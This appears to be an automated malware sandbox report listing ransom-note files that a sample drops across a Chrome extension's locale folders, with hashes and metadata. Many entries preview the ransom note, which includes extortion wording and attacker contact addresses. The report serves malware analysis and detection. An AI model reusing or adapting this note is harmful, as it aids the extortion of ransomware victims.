                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\ar\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\bg\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\ca\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\cs\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\da\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\de\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\el\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\en_GB\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\en_US\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\es\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\es_419\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\et\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\fi\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\fil\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\fr\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\he\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\hi\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\hu\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\id\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\it\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\ja\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\ko\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\lt\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\lv\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\ms\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\nl\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\no\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\pl\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\pt_BR\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\pt_PT\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\ro\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\ru\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\sk\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\sl\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\sr\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\sv\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\th\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
